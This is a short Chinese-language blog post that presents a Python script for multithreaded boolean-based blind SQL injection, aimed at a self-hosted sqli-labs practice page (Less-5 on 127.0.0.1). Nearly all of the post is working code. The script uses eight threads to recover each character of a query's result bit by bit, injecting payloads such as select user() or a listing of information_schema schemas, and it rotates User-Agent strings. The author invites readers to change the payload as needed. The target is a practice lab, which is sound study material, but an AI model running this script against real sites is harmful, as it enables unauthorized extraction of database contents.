比二分法更OK的盲注多线程（python脚本）

 废话不多说直接上代码：

import threading
import requests
user_agent = [
            "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3"
]
class MyThread(threading.Thread):
    def __init__(self, func, args):
        threading.Thread.__init__(self)
        self.func = func
        self.args = args
    def getresult(self):
        return self.res
    def run(self):
        self.res = self.func(*self.args)
def asc(a,i,payload):
    asci = 2**i
    url = "http://127.0.0.1/2/Less-5/?id=1'and ascii(substr(("+payload+"),"+str(a)+",1))%26"+str(asci)+"="+str(asci)+ "--+"
    header = {'User-Agent': user_agent[i]}
    html = requests.get(url, headers=header)
    if html.text.find("You are in...........")!=-1:
        return asci
    return 0
def main():
    payload = input('请输入payload(比如select user()/user()/SELECT group_concat(SCHEMA_name) from information_schema.SCHEMATA)：')
    a=1
    f=True
    char = ''
    while f:
        threads = []
        sum = 0
        for i in range(0,8):
            t = MyThread(asc, (a, i, payload))
            threads.append(t)
        for i in range(0,8):
            threads[i].start()
        for i in range(0,8):
            threads[i].join()
            sum = sum + threads[i].getresult()
        if sum ==0:
            f = False
        char = char +chr(sum)
        a = a+1
    print(char)
if __name__ == '__main__':
    main()

网站是自己搭建的sql-libs，自己根据需要修改payload吧。